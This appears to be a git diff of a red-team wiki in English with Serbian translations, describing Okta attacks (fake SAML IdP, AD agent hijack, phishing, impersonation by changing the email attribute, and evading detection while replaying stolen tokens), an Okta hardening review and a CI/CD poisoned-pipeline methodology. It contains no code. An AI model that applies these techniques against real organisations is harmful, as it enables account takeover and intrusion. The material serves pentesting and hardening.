**Check the attack in** [**https://trustedsec.com/blog/okta-for-red-teamers**](https://trustedsec.com/blog/okta-for-red-teamers)**.**
**Proverite napad u** [**https://trustedsec.com/blog/okta-for-red-teamers**](https://trustedsec.com/blog/okta-for-red-teamers)**.**
### Hijacking AD As an Admin
### Otimanje AD kao Administrator
This technique involves hijacking an Okta AD Agent by first obtaining an OAuth Code, then requesting an API token. The token is associated with an AD domain, and a **connector is named to establish a fake AD agent**. Initialization allows the agent to **process authentication attempts**, capturing credentials via the Okta API. Automation tools are available to streamline this process, offering a seamless method to intercept and handle authentication data within the Okta environment.
Ova tehnika uključuje otimanje Okta AD Agenta prvo dobijanjem OAuth Koda, a zatim traženjem API tokena. Token je povezan sa AD domenom, a **konektor je imenovan da uspostavi lažni AD agent**. Inicijalizacija omogućava agentu da **obrađuje pokušaje autentifikacije**, hvatajući podatke putem Okta API-ja. Alati za automatizaciju su dostupni za pojednostavljenje ovog procesa, nudeći besprekornu metodu za presretanje i rukovanje podacima o autentifikaciji unutar Okta okruženja.
**Check the attack in** [**https://trustedsec.com/blog/okta-for-red-teamers**](https://trustedsec.com/blog/okta-for-red-teamers)**.**
**Proverite napad u** [**https://trustedsec.com/blog/okta-for-red-teamers**](https://trustedsec.com/blog/okta-for-red-teamers)**.**
### Okta Fake SAML Provider
### Lažni Okta SAML Pružalac
**Check the attack in** [**https://trustedsec.com/blog/okta-for-red-teamers**](https://trustedsec.com/blog/okta-for-red-teamers)**.**
**Proverite napad u** [**https://trustedsec.com/blog/okta-for-red-teamers**](https://trustedsec.com/blog/okta-for-red-teamers)**.**
The technique involves **deploying a fake SAML provider**. By integrating an external Identity Provider (IdP) within Okta's framework using a privileged account, attackers can **control the IdP, approving any authentication request at will**. The process entails setting up a SAML 2.0 IdP in Okta, manipulating the IdP Single Sign-On URL for redirection via local hosts file, generating a self-signed certificate, and configuring Okta settings to match against the username or email. Successfully executing these steps allows for authentication as any Okta user, bypassing the need for individual user credentials, significantly elevating access control in a potentially unnoticed manner.
Tehnika uključuje **implementaciju lažnog SAML pružaoca**. Integracijom spoljnog Identity Providera (IdP) unutar Okta okvira koristeći privilegovani nalog, napadači mogu **kontrolisati IdP, odobravajući bilo koji zahtev za autentifikaciju po želji**. Proces podrazumeva postavljanje SAML 2.0 IdP u Okta, manipulaciju IdP Single Sign-On URL-om za preusmeravanje putem lokalnog hosts fajla, generisanje samopotpisanog sertifikata i konfiguraciju Okta postavki da se podudaraju sa korisničkim imenom ili email-om. Uspešno izvršavanje ovih koraka omogućava autentifikaciju kao bilo koji Okta korisnik, zaobilazeći potrebu za pojedinačnim korisničkim podacima, značajno povećavajući kontrolu pristupa na potencijalno neprimetan način.
### Phishing Okta Portal with Evilgnix
### Phishing Okta Portala sa Evilgnix
In [**this blog post**](https://medium.com/nickvangilder/okta-for-red-teamers-perimeter-edition-c60cb8d53f23) is explained how to prepare a phishing campaign against an Okta portal.
U [**ovom blog postu**](https://medium.com/nickvangilder/okta-for-red-teamers-perimeter-edition-c60cb8d53f23) objašnjeno je kako pripremiti phishing kampanju protiv Okta portala.
### Colleague Impersonation Attack
### Napad imitacije kolege
The **attributes that each user can have and modify** (like email or first name) can be configured in Okta. If an **application** is **trusting** as ID an **attribute** that the user can **modify**, he will be able to **impersonate other users in that platform**.
**atributi koje svaki korisnik može imati i modifikovati** (kao što su email ili ime) mogu se konfigurisati u Okta. Ako je **aplikacija** **pouzdana** kao ID **atribut** koji korisnik može **modifikovati**, moći će da **imitira druge korisnike na toj platformi**.
Therefore, if the app is trusting the field **`userName`**, you probably won't be able to change it (because you usually cannot change that field), but if it's trusting for example **`primaryEmail`** you might be able to **change it to a colleagues email address** and impersonate it (you will need to have access to the email and accept the change).
Stoga, ako aplikacija veruje polju **`userName`**, verovatno nećete moći da ga promenite (jer obično ne možete promeniti to polje), ali ako veruje na primer **`primaryEmail`** možda ćete moći da **promenite na email adresu kolege** i imitirati ga (trebaće vam pristup email-u i da prihvatite promenu).
Note that this impersoantion depends on how each application was condigured. Only the ones trusting the field you modified and accepting updates will be compromised.\
Therefore, the app should have this field enabled if it exists:
Napomena da ova imitacija zavisi od toga kako je svaka aplikacija konfigurisana. Samo one koje veruju polju koje ste modifikovali i prihvataju ažuriranja će biti kompromitovane.\
Stoga, aplikacija treba da ima ovo polje omogućeno ako postoji:
<figure><img src="../../images/image (175).png" alt=""><figcaption></figcaption></figure>
I have also seen other apps that were vulnerable but didn't have that field in the Okta settings (at the end different apps are configured differently).
Takođe sam video druge aplikacije koje su bile ranjive, ali nisu imale to polje u Okta postavkama (na kraju, različite aplikacije su konfigurisane različito).
The best way to find out if you could impersonate anyone on each app would be to try it!
Najbolji način da saznate da li možete imitirati nekoga na svakoj aplikaciji bio bi da probate!
## Evading behavioural detection policies <a href="#id-9fde" id="id-9fde"></a>
## Izbegavanje politika detekcije ponašanja <a href="#id-9fde" id="id-9fde"></a>
Behavioral detection policies in Okta might be unknown until encountered, but **bypassing** them can be achieved by **targeting Okta applications directly**, avoiding the main Okta dashboard. With an **Okta access token**, replay the token at the **application-specific Okta URL** instead of the main login page.
Politike detekcije ponašanja u Okta možda su nepoznate dok se ne susretnete s njima, ali **zaobilaženje** njih može se postići **ciljanjem Okta aplikacija direktno**, izbegavajući glavnu Okta kontrolnu tablu. Sa **Okta pristupnim tokenom**, ponovo upotrebite token na **URL-u specifičnom za aplikaciju Okta** umesto na glavnoj stranici za prijavu.
Key recommendations include:
Ključne preporuke uključuju:
- **Avoid using** popular anonymizer proxies and VPN services when replaying captured access tokens.
- Ensure **consistent user-agent strings** between the client and replayed access tokens.
- **Refrain from replaying** tokens from different users from the same IP address.
- Exercise caution when replaying tokens against the Okta dashboard.
- If aware of the victim company's IP addresses, **restrict traffic** to those IPs or their range, blocking all other traffic.
- **Izbegavajte korišćenje** popularnih anonimnih proksija i VPN usluga prilikom ponovnog korišćenja uhvaćenih pristupnih tokena.
- Osigurajte **dosledne user-agent stringove** između klijenta i ponovo korišćenih pristupnih tokena.
- **Izbegavajte ponovnu upotrebu** tokena od različitih korisnika sa iste IP adrese.
- Budite oprezni prilikom ponovnog korišćenja tokena protiv Okta kontrolne table.
- Ako ste svesni IP adresa kompanije žrtve, **ograničite saobraćaj** na te IP adrese ili njihov opseg, blokirajući sav ostali saobraćaj.
## Okta Hardening
## Okta Ojačavanje
Okta has a lot of possible configurations, in this page you will find how to review them so they are as secure as possible:
Okta ima mnogo mogućih konfiguracija, na ovoj stranici ćete pronaći kako da ih pregledate kako bi bile što sigurnije:
{{#ref}}
okta-hardening.md
{{#endref}}
## References
## Reference
- [https://trustedsec.com/blog/okta-for-red-teamers](https://trustedsec.com/blog/okta-for-red-teamers)
- [https://medium.com/nickvangilder/okta-for-red-teamers-perimeter-edition-c60cb8d53f23](https://medium.com/nickvangilder/okta-for-red-teamers-perimeter-edition-c60cb8d53f23)
{{#include ../../banners/hacktricks-training.md}}

126
src/pentesting-ci-cd/okta-security/okta-hardening.md
View File

@@ -6,72 +6,72 @@
### People
From an attackers perspective, this is super interesting as you will be able to see **all the users registered**, their **email** addresses, the **groups** they are part of, **profiles** and even **devices** (mobiles along with their OSs).
Iz perspektive napadača, ovo je veoma zanimljivo jer ćete moći da vidite **sve registrovane korisnike**, njihove **email** adrese, **grupe** kojima pripadaju, **profile** i čak **uređaje** (mobilne telefone zajedno sa njihovim OS-ovima).
For a whitebox review check that there aren't several "**Pending user action**" and "**Password reset**".
Za pregled u beloj kutiji proverite da nema više od nekoliko "**Pending user action**" i "**Password reset**".
### Groups
This is where you find all the created groups in Okta. it's interesting to understand the different groups (set of **permissions**) that could be granted to **users**.\
It's possible to see the **people included inside groups** and **apps assigned** to each group.
Ovde možete pronaći sve kreirane grupe u Okta. Zanimljivo je razumeti različite grupe (set **dozvola**) koje mogu biti dodeljene **korisnicima**.\
Moguće je videti **ljude uključene u grupe** i **aplikacije dodeljene** svakoj grupi.
Ofc, any group with the name of **admin** is interesting, specially the group **Global Administrators,** check the members to learn who are the most privileged members.
Naravno, svaka grupa sa imenom **admin** je zanimljiva, posebno grupa **Global Administrators**, proverite članove da saznate ko su najprivilegovaniji članovi.
From a whitebox review, there **shouldn't be more than 5 global admins** (better if there are only 2 or 3).
Iz pregleda u beloj kutiji, **ne bi trebalo da bude više od 5 globalnih admina** (bolje je ako ih ima samo 2 ili 3).
### Devices
Find here a **list of all the devices** of all the users. You can also see if it's being **actively managed** or not.
Ovde pronađite **listu svih uređaja** svih korisnika. Takođe možete videti da li se **aktivno upravlja** njima ili ne.
### Profile Editor
Here is possible to observe how key information such as first names, last names, emails, usernames... are shared between Okta and other applications. This is interesting because if a user can **modify in Okta a field** (such as his name or email) that then is used by an **external application** to **identify** the user, an insider could try to **take over other accounts**.
Ovde je moguće posmatrati kako se ključne informacije kao što su imena, prezimena, emailovi, korisnička imena... dele između Okta i drugih aplikacija. Ovo je zanimljivo jer ako korisnik može **modifikovati u Okta polje** (kao što je njegovo ime ili email) koje se zatim koristi od strane **spoljne aplikacije** za **identifikaciju** korisnika, insajder bi mogao pokušati da **preuzme druge naloge**.
Moreover, in the profile **`User (default)`** from Okta you can see **which fields** each **user** has and which ones are **writable** by users. If you cannot see the admin panel, just go to **update your profile** information and you will see which fields you can update (note that to update an email address you will need to verify it).
Štaviše, u profilu **`User (default)`** iz Okta možete videti **koja polja** svaki **korisnik** ima i koja su **pisiva** od strane korisnika. Ako ne možete videti admin panel, jednostavno idite na **ažuriranje informacija o profilu** i videćete koja polja možete ažurirati (napomena: da biste ažurirali email adresu, moraćete da je verifikujete).
### Directory Integrations
Directories allow you to import people from existing sources. I guess here you will see the users imported from other directories.
Direktorijumi vam omogućavaju da uvezete ljude iz postojećih izvora. Pretpostavljam da ćete ovde videti korisnike uvezene iz drugih direktorijuma.
I haven't seen it, but I guess this is interesting to find out **other directories that Okta is using to import users** so if you **compromise that directory** you could set some attributes values in the users created in Okta and **maybe compromise the Okta env**.
Nisam to video, ali pretpostavljam da je zanimljivo otkriti **druge direktorijume koje Okta koristi za uvoz korisnika** tako da ako **kompromitujete taj direktorijum** mogli biste postaviti neke vrednosti atributa u korisnicima kreiranim u Okta i **možda kompromitovati Okta okruženje**.
### Profile Sources
A profile source is an **application that acts as a source of truth** for user profile attributes. A user can only be sourced by a single application or directory at a time.
Izvor profila je **aplikacija koja deluje kao izvor istine** za atribute korisničkog profila. Korisnik može biti izvor samo iz jedne aplikacije ili direktorijuma u isto vreme.
I haven't seen it, so any information about security and hacking regarding this option is appreciated.
Nisam to video, tako da su sve informacije o bezbednosti i hakovanju u vezi sa ovom opcijom dobrodošle.
## Customizations
### Brands
Check in the **Domains** tab of this section the email addresses used to send emails and the custom domain inside Okta of the company (which you probably already know).
Proverite u **Domains** tabu ove sekcije email adrese korišćene za slanje emailova i prilagođeni domen unutar Okta kompanije (što verovatno već znate).
Moreover, in the **Setting** tab, if you are admin, you can "**Use a custom sign-out page**" and set a custom URL.
Štaviše, u **Setting** tabu, ako ste admin, možete "**Use a custom sign-out page**" i postaviti prilagođeni URL.
### SMS
Nothing interesting here.
Ovde nema ništa zanimljivo.
### End-User Dashboard
You can find here applications configured, but we will see the details of those later in a different section.
Ovde možete pronaći aplikacije koje su konfigurirane, ali ćemo detalje o njima videti kasnije u drugoj sekciji.
### Other
Interesting setting, but nothing super interesting from a security point of view.
Zanimljiva podešavanja, ali ništa super zanimljivo iz perspektive bezbednosti.
## Applications
### Applications
Here you can find all the **configured applications** and their details: Who has access to them, how is it configured (SAML, OPenID), URL to login, the mappings between Okta and the application...
Ovde možete pronaći sve **konfigurisane aplikacije** i njihove detalje: Ko ima pristup njima, kako je konfigurisano (SAML, OpenID), URL za prijavu, mapiranja između Okta i aplikacije...
In the **`Sign On`** tab there is also a field called **`Password reveal`** that would allow a user to **reveal his password** when checking the application settings. To check the settings of an application from the User Panel, click the 3 dots:
U **`Sign On`** tabu postoji i polje pod nazivom **`Password reveal`** koje bi omogućilo korisniku da **otkrije svoju lozinku** prilikom provere podešavanja aplikacije. Da biste proverili podešavanja aplikacije iz korisničkog panela, kliknite na 3 tačke:
<figure><img src="../../images/image (283).png" alt=""><figcaption></figcaption></figure>
And you could see some more details about the app (like the password reveal feature, if it's enabled):
I mogli biste videti još neke detalje o aplikaciji (kao što je funkcija otkrivanja lozinke, ako je omogućena):
<figure><img src="../../images/image (220).png" alt=""><figcaption></figcaption></figure>
@@ -79,125 +79,121 @@ And you could see some more details about the app (like the password reveal feat
### Access Certifications
Use Access Certifications to create audit campaigns to review your users' access to resources periodically and approve or revoke access automatically when required.
Koristite Access Certifications za kreiranje revizorskih kampanja kako biste periodično pregledali pristup vaših korisnika resursima i automatski odobrili ili opozvali pristup kada je to potrebno.
I haven't seen it used, but I guess that from a defensive point of view it's a nice feature.
Nisam to video korišćeno, ali pretpostavljam da je iz odbrambene tačke gledišta to lepa funkcija.
## Security
### General
- **Security notification emails**: All should be enabled.
- **CAPTCHA integration**: It's recommended to set at least the invisible reCaptcha
- **Organization Security**: Everything can be enabled and activation emails shouldn't last long (7 days is ok)
- **User enumeration prevention**: Both should be enabled
- Note that User Enumeration Prevention doesn't take effect if either of the following conditions are allowed (See [User management](https://help.okta.com/oie/en-us/Content/Topics/users-groups-profiles/usgp-main.htm) for more information):
- Self-Service Registration
- JIT flows with email authentication
- **Okta ThreatInsight settings**: Log and enforce security based on threat level
- **Security notification emails**: Sve bi trebalo da budu omogućene.
- **CAPTCHA integration**: Preporučuje se postavljanje barem nevidljivog reCaptche
- **Organization Security**: Sve može biti omogućeno i aktivacione email adrese ne bi trebale dugo trajati (7 dana je u redu)
- **User enumeration prevention**: Obe bi trebale biti omogućene
- Imajte na umu da User Enumeration Prevention ne stupa na snagu ako su dozvoljeni bilo koji od sledećih uslova (Pogledajte [User management](https://help.okta.com/oie/en-us/Content/Topics/users-groups-profiles/usgp-main.htm) za više informacija):
- Samostalna registracija
- JIT tokovi sa email autentifikacijom
- **Okta ThreatInsight settings**: Zabeležite i primenite bezbednost na osnovu nivoa pretnje
### HealthInsight
Here is possible to find correctly and **dangerous** configured **settings**.
Ovde je moguće pronaći ispravno i **opasno** konfigurisane **postavke**.
### Authenticators
Here you can find all the authentication methods that a user could use: Password, phone, email, code, WebAuthn... Clicking in the Password authenticator you can see the **password policy**. Check that it's strong.
Ovde možete pronaći sve metode autentifikacije koje korisnik može koristiti: Lozinka, telefon, email, kod, WebAuthn... Klikom na autentifikator lozinke možete videti **politiku lozinke**. Proverite da li je jaka.
In the **Enrollment** tab you can see how the ones that are required or optinal:
U **Enrollment** tabu možete videti kako su one koje su obavezne ili opcione:
<figure><img src="../../images/image (143).png" alt=""><figcaption></figcaption></figure>
It's recommendatble to disable Phone. The strongest ones are probably a combination of password, email and WebAuthn.
Preporučuje se onemogućavanje telefona. Najjače su verovatno kombinacije lozinke, emaila i WebAuthn.
### Authentication policies
Every app has an authentication policy. The authentication policy verifies that users who try to sign in to the app meet specific conditions, and it enforces factor requirements based on those conditions.
Svaka aplikacija ima politiku autentifikacije. Politika autentifikacije proverava da li korisnici koji pokušavaju da se prijave u aplikaciju ispunjavaju određene uslove, i primenjuje zahteve faktora na osnovu tih uslova.
Here you can find the **requirements to access each application**. It's recommended to request at least password and another method for each application. But if as attacker you find something more weak you might be able to attack it.
Ovde možete pronaći **zahteve za pristup svakoj aplikaciji**. Preporučuje se da se zahteva barem lozinka i još jedna metoda za svaku aplikaciju. Ali ako kao napadač pronađete nešto slabije, mogli biste to napasti.
### Global Session Policy
Here you can find the session policies assigned to different groups. For example:
Ovde možete pronaći politike sesije dodeljene različitim grupama. Na primer:
<figure><img src="../../images/image (245).png" alt=""><figcaption></figcaption></figure>
It's recommended to request MFA, limit the session lifetime to some hours, don't persis session cookies across browser extensions and limit the location and Identity Provider (if this is possible). For example, if every user should be login from a country you could only allow this location.
Preporučuje se zahtevati MFA, ograničiti trajanje sesije na nekoliko sati, ne čuvati kolačiće sesije preko ekstenzija pretraživača i ograničiti lokaciju i provajdera identiteta (ako je to moguće). Na primer, ako svaki korisnik treba da se prijavi iz određene zemlje, mogli biste dozvoliti samo tu lokaciju.
### Identity Providers
Identity Providers (IdPs) are services that **manage user accounts**. Adding IdPs in Okta enables your end users to **self-register** with your custom applications by first authenticating with a social account or a smart card.
Provajderi identiteta (IdP) su usluge koje **upravljaju korisničkim nalozima**. Dodavanje IdP-a u Okta omogućava vašim krajnjim korisnicima da se **samo-registruju** sa vašim prilagođenim aplikacijama prvo autentifikovanjem sa društvenim nalogom ili pametnom karticom.
On the Identity Providers page, you can add social logins (IdPs) and configure Okta as a service provider (SP) by adding inbound SAML. After you've added IdPs, you can set up routing rules to direct users to an IdP based on context, such as the user's location, device, or email domain.
Na stranici Provajderi identiteta možete dodati društvene prijave (IdP) i konfigurisati Okta kao provajdera usluga (SP) dodavanjem ulaznog SAML-a. Nakon što dodate IdP, možete postaviti pravila usmeravanja kako biste usmerili korisnike ka IdP-u na osnovu konteksta, kao što su lokacija korisnika, uređaj ili email domena.
**If any identity provider is configured** from an attackers and defender point of view check that configuration and **if the source is really trustable** as an attacker compromising it could also get access to the Okta environment.
**Ako je bilo koji provajder identiteta konfiguran** iz perspektive napadača i branioca proverite tu konfiguraciju i **da li je izvor zaista pouzdan** jer bi napadač koji ga kompromituje mogao takođe dobiti pristup Okta okruženju.
### Delegated Authentication
Delegated authentication allows users to sign in to Okta by entering credentials for their organization's **Active Directory (AD) or LDAP** server.
Delegirana autentifikacija omogućava korisnicima da se prijave u Okta unosom akreditiva za **Active Directory (AD) ili LDAP** server njihove organizacije.
Again, recheck this, as an attacker compromising an organizations AD could be able to pivot to Okta thanks to this setting.
Ponovo, proverite ovo, jer bi napadač koji kompromituje AD organizacije mogao biti u mogućnosti da pređe na Okta zahvaljujući ovoj postavci.
### Network
A network zone is a configurable boundary that you can use to **grant or restrict access to computers and devices** in your organization based on the **IP address** that is requesting access. You can define a network zone by specifying one or more individual IP addresses, ranges of IP addresses, or geographic locations.
Mrežna zona je konfigurisiva granica koju možete koristiti da **dodelite ili ograničite pristup računarima i uređajima** u vašoj organizaciji na osnovu **IP adrese** koja traži pristup. Možete definisati mrežnu zonu tako što ćete odrediti jednu ili više pojedinačnih IP adresa, opsega IP adresa ili geografskih lokacija.
After you define one or more network zones, you can **use them in Global Session Policies**, **authentication policies**, VPN notifications, and **routing rules**.
Nakon što definišete jednu ili više mrežnih zona, možete **koristiti ih u Global Session Policies**, **politike autentifikacije**, VPN obaveštenja i **pravila usmeravanja**.
From an attackers perspective it's interesting to know which Ps are allowed (and check if any **IPs are more privileged** than others). From an attackers perspective, if the users should be accessing from an specific IP address or region check that this feature is used properly.
Iz perspektive napadača zanimljivo je znati koje IP adrese su dozvoljene (i proveriti da li su neke **IP adrese privilegovanije** od drugih). Iz perspektive napadača, ako korisnici treba da pristupaju sa određene IP adrese ili regiona, proverite da li se ova funkcija pravilno koristi.
### Device Integrations
- **Endpoint Management**: Endpoint management is a condition that can be applied in an authentication policy to ensure that managed devices have access to an application.
- I haven't seen this used yet. TODO
- **Notification services**: I haven't seen this used yet. TODO
- **Endpoint Management**: Upravljanje krajnjim tačkama je uslov koji se može primeniti u politici autentifikacije kako bi se osiguralo da upravljani uređaji imaju pristup aplikaciji.
- Nisam to još video. TODO
- **Notification services**: Nisam to još video. TODO
### API
You can create Okta API tokens in this page, and see the ones that have been **created**, theirs **privileges**, **expiration** time and **Origin URLs**. Note that an API tokens are generated with the permissions of the user that created the token and are valid only if the **user** who created them is **active**.
Možete kreirati Okta API tokene na ovoj stranici, i videti one koji su **kreirani**, njihove **privilegije**, **vreme isteka** i **Izvorne URL-ove**. Imajte na umu da se API tokeni generišu sa dozvolama korisnika koji je kreirao token i važe samo ako je **korisnik** koji ih je kreirao **aktivan**.
The **Trusted Origins** grant access to websites that you control and trust to access your Okta org through the Okta API.
**Trusted Origins** omogućavaju pristup veb sajtovima koje kontrolišete i kojima verujete da pristupaju vašem Okta okruženju putem Okta API-ja.
There shuoldn't be a lot of API tokens, as if there are an attacker could try to access them and use them.
Ne bi trebalo da bude puno API tokena, jer ako ih ima, napadač bi mogao pokušati da im pristupi i koristi ih.
## Workflow
### Automations
Automations allow you to create automated actions that run based on a set of trigger conditions that occur during the lifecycle of end users.
Automatizacije vam omogućavaju da kreirate automatske akcije koje se pokreću na osnovu skupa uslova okidača koji se javljaju tokom životnog ciklusa krajnjih korisnika.
For example a condition could be "User inactivity in Okta" or "User password expiration in Okta" and the action could be "Send email to the user" or "Change user lifecycle state in Okta".
Na primer, uslov bi mogao biti "Neaktivnost korisnika u Okta" ili "Isticanje lozinke korisnika u Okta" i akcija bi mogla biti "Pošaljite email korisniku" ili "Promenite stanje životnog ciklusa korisnika u Okta".
## Reports
### Reports
Download logs. They are **sent** to the **email address** of the current account.
Preuzmite logove. Oni se **šalju** na **email adresu** trenutnog naloga.
### System Log
Here you can find the **logs of the actions performed by users** with a lot of details like login in Okta or in applications through Okta.
Ovde možete pronaći **logove akcija koje su izvršili korisnici** sa puno detalja kao što su prijava u Okta ili u aplikacije putem Okta.
### Import Monitoring
This can **import logs from the other platforms** accessed with Okta.
Ovo može **uvoziti logove iz drugih platformi** kojima se pristupa putem Okta.
### Rate limits
Check the API rate limits reached.
Proverite dostignute API limite.
## Settings
### Account
Here you can find **generic information** about the Okta environment, such as the company name, address, **email billing contact**, **email technical contact** and also who should receive Okta updates and which kind of Okta updates.
Ovde možete pronaći **opšte informacije** o Okta okruženju, kao što su ime kompanije, adresa, **email kontakt za fakturiranje**, **email kontakt za tehničku podršku** i takođe ko bi trebao primati Okta ažuriranja i koja vrsta Okta ažuriranja.
### Downloads
Here you can download Okta agents to sync Okta with other technologies.
Ovde možete preuzeti Okta agente za sinhronizaciju Okta sa drugim tehnologijama.
{{#include ../../banners/hacktricks-training.md}}

94
src/pentesting-ci-cd/pentesting-ci-cd-methodology.md
View File

@@ -6,103 +6,99 @@
## VCS
VCS stands for **Version Control System**, this systems allows developers to **manage their source code**. The most common one is **git** and you will usually find companies using it in one of the following **platforms**:
VCS označava **Sistem za kontrolu verzija**, ovaj sistem omogućava programerima da **upravljaju svojim izvorni kodom**. Najčešći je **git** i obično ćete pronaći kompanije koje ga koriste na jednoj od sledećih **platformi**:
- Github
- Gitlab
- Bitbucket
- Gitea
- Cloud providers (they offer their own VCS platforms)
- Cloud provajderi (oni nude svoje VCS platforme)
## CI/CD Pipelines
CI/CD pipelines enable developers to **automate the execution of code** for various purposes, including building, testing, and deploying applications. These automated workflows are **triggered by specific actions**, such as code pushes, pull requests, or scheduled tasks. They are useful for streamlining the process from development to production.
CI/CD pipelines omogućavaju programerima da **automatizuju izvršenje koda** za različite svrhe, uključujući izgradnju, testiranje i implementaciju aplikacija. Ovi automatizovani radni tokovi se **pokreću specifičnim akcijama**, kao što su push-ovi koda, pull zahtevi ili zakazani zadaci. Oni su korisni za pojednostavljenje procesa od razvoja do produkcije.
However, these systems need to be **executed somewhere** and usually with **privileged credentials to deploy code or access sensitive information**.
Međutim, ovi sistemi moraju biti **izvršeni negde** i obično sa **privilegovanim akreditivima za implementaciju koda ili pristup osetljivim informacijama**.
## VCS Pentesting Methodology
> [!NOTE]
> Even if some VCS platforms allow to create pipelines for this section we are going to analyze only potential attacks to the control of the source code.
> Čak i ako neke VCS platforme omogućavaju kreiranje pipelines, u ovoj sekciji ćemo analizirati samo potencijalne napade na kontrolu izvornog koda.
Platforms that contains the source code of your project contains sensitive information and people need to be very careful with the permissions granted inside this platform. These are some common problems across VCS platforms that attacker could abuse:
Platforme koje sadrže izvorni kod vašeg projekta sadrže osetljive informacije i ljudi moraju biti veoma oprezni sa dozvolama dodeljenim unutar ove platforme. Ovo su neki uobičajeni problemi na VCS platformama koje napadač može zloupotrebiti:
- **Leaks**: If your code contains leaks in the commits and the attacker can access the repo (because it's public or because he has access), he could discover the leaks.
- **Access**: If an attacker can **access to an account inside the VCS platform** he could gain **more visibility and permissions**.
- **Register**: Some platforms will just allow external users to create an account.
- **SSO**: Some platforms won't allow users to register, but will allow anyone to access with a valid SSO (so an attacker could use his github account to enter for example).
- **Credentials**: Username+Pwd, personal tokens, ssh keys, Oauth tokens, cookies... there are several kind of tokens a user could steal to access in some way a repo.
- **Webhooks**: VCS platforms allow to generate webhooks. If they are **not protected** with non visible secrets an **attacker could abuse them**.
- If no secret is in place, the attacker could abuse the webhook of the third party platform
- If the secret is in the URL, the same happens and the attacker also have the secret
- **Code compromise:** If a malicious actor has some kind of **write** access over the repos, he could try to **inject malicious code**. In order to be successful he might need to **bypass branch protections**. These actions can be performed with different goals in mid:
- Compromise the main branch to **compromise production**.
- Compromise the main (or other branches) to **compromise developers machines** (as they usually execute test, terraform or other things inside the repo in their machines).
- **Compromise the pipeline** (check next section)
- **Leaking**: Ako vaš kod sadrži leak-ove u commit-ima i napadač može pristupiti repozitorijumu (jer je javan ili jer ima pristup), mogao bi otkriti leak-ove.
- **Pristup**: Ako napadač može **pristupiti nalogu unutar VCS platforme**, mogao bi dobiti **veću vidljivost i dozvole**.
- **Registracija**: Neke platforme će samo omogućiti spoljnim korisnicima da kreiraju nalog.
- **SSO**: Neke platforme neće dozvoliti korisnicima da se registruju, ali će omogućiti svakome da pristupi sa važećim SSO (tako da napadač može koristiti svoj github nalog da uđe, na primer).
- **Akreditivi**: Korisničko ime+Lozinka, lični tokeni, ssh ključevi, Oauth tokeni, kolačići... postoji nekoliko vrsta tokena koje korisnik može ukrasti da bi na neki način pristupio repozitorijumu.
- **Webhooks**: VCS platforme omogućavaju generisanje webhooks. Ako nisu **zaštićeni** nevidljivim tajnama, **napadač bi mogao da ih zloupotrebi**.
- Ako nema tajne, napadač bi mogao zloupotrebiti webhook treće strane
- Ako je tajna u URL-u, isto se dešava i napadač takođe ima tajnu
- **Kompromitovanje koda:** Ako zlonameran akter ima neku vrstu **write** pristupa nad repozitorijumima, mogao bi pokušati da **ubaci zlonamerni kod**. Da bi bio uspešan, možda će morati da **obiđe zaštite grana**. Ove akcije se mogu izvesti sa različitim ciljevima na umu:
- Kompromitovati glavnu granu da bi **kompromitovao produkciju**.
- Kompromitovati glavnu (ili druge grane) da bi **kompromitovao mašine programera** (jer obično izvršavaju testove, terraform ili druge stvari unutar repozitorijuma na svojim mašinama).
- **Kompromitovati pipeline** (proverite sledeću sekciju)
## Pipelines Pentesting Methodology
The most common way to define a pipeline, is by using a **CI configuration file hosted in the repository** the pipeline builds. This file describes the order of executed jobs, conditions that affect the flow, and build environment settings.\
These files typically have a consistent name and format, for example — Jenkinsfile (Jenkins), .gitlab-ci.yml (GitLab), .circleci/config.yml (CircleCI), and the GitHub Actions YAML files located under .github/workflows. When triggered, the pipeline job **pulls the code** from the selected source (e.g. commit / branch), and **runs the commands specified in the CI configuration file** against that code.
Najčešći način da se definiše pipeline je korišćenjem **CI konfiguracione datoteke smeštene u repozitorijumu** koji pipeline gradi. Ova datoteka opisuje redosled izvršenih poslova, uslove koji utiču na tok i postavke okruženja za izgradnju.\
Ove datoteke obično imaju dosledno ime i format, na primer — Jenkinsfile (Jenkins), .gitlab-ci.yml (GitLab), .circleci/config.yml (CircleCI), i YAML datoteke GitHub Actions smeštene pod .github/workflows. Kada se pokrene, posao pipeline-a **povlači kod** iz odabranog izvora (npr. commit / grana), i **izvodi komande navedene u CI konfiguracionoj datoteci** protiv tog koda.
Therefore the ultimate goal of the attacker is to somehow **compromise those configuration files** or the **commands they execute**.
Stoga je krajnji cilj napadača da na neki način **kompromituje te konfiguracione datoteke** ili **komande koje izvršavaju**.
### PPE - Poisoned Pipeline Execution
The Poisoned Pipeline Execution (PPE) path exploits permissions in an SCM repository to manipulate a CI pipeline and execute harmful commands. Users with the necessary permissions can modify CI configuration files or other files used by the pipeline job to include malicious commands. This "poisons" the CI pipeline, leading to the execution of these malicious commands.
Putanja Poisoned Pipeline Execution (PPE) koristi dozvole u SCM repozitorijumu da manipuliše CI pipeline-om i izvrši štetne komande. Korisnici sa potrebnim dozvolama mogu modifikovati CI konfiguracione datoteke ili druge datoteke koje koristi posao pipeline-a da uključe zlonamerne komande. Ovo "otrovava" CI pipeline, što dovodi do izvršenja ovih zlonamernih komandi.
For a malicious actor to be successful performing a PPE attack he needs to be able to:
Da bi zlonameran akter bio uspešan u izvođenju PPE napada, mora biti u mogućnosti da:
- Have **write access to the VCS platform**, as usually pipelines are triggered when a push or a pull request is performed. (Check the VCS pentesting methodology for a summary of ways to get access).
- Note that sometimes an **external PR count as "write access"**.
- Even if he has write permissions, he needs to be sure he can **modify the CI config file or other files the config is relying on**.
- For this, he might need to be able to **bypass branch protections**.
- Ima **write pristup VCS platformi**, jer se obično pipelines pokreću kada se izvrši push ili pull zahtev. (Proverite VCS pentesting metodologiju za sažetak načina za dobijanje pristupa).
- Imajte na umu da ponekad **spoljni PR računa kao "write pristup"**.
- Čak i ako ima write dozvole, mora biti siguran da može **modifikovati CI konfiguracionu datoteku ili druge datoteke na koje se konfiguracija oslanja**.
- Za to, možda će morati da bude u mogućnosti da **obiđe zaštite grana**.
There are 3 PPE flavours:
Postoje 3 vrste PPE:
- **D-PPE**: A **Direct PPE** attack occurs when the actor **modifies the CI config** file that is going to be executed.
- **I-DDE**: An **Indirect PPE** attack occurs when the actor **modifies** a **file** the CI config file that is going to be executed **relays on** (like a make file or a terraform config).
- **Public PPE or 3PE**: In some cases the pipelines can be **triggered by users that doesn't have write access in the repo** (and that might not even be part of the org) because they can send a PR.
- **3PE Command Injection**: Usually, CI/CD pipelines will **set environment variables** with **information about the PR**. If that value can be controlled by an attacker (like the title of the PR) and is **used** in a **dangerous place** (like executing **sh commands**), an attacker might **inject commands in there**.
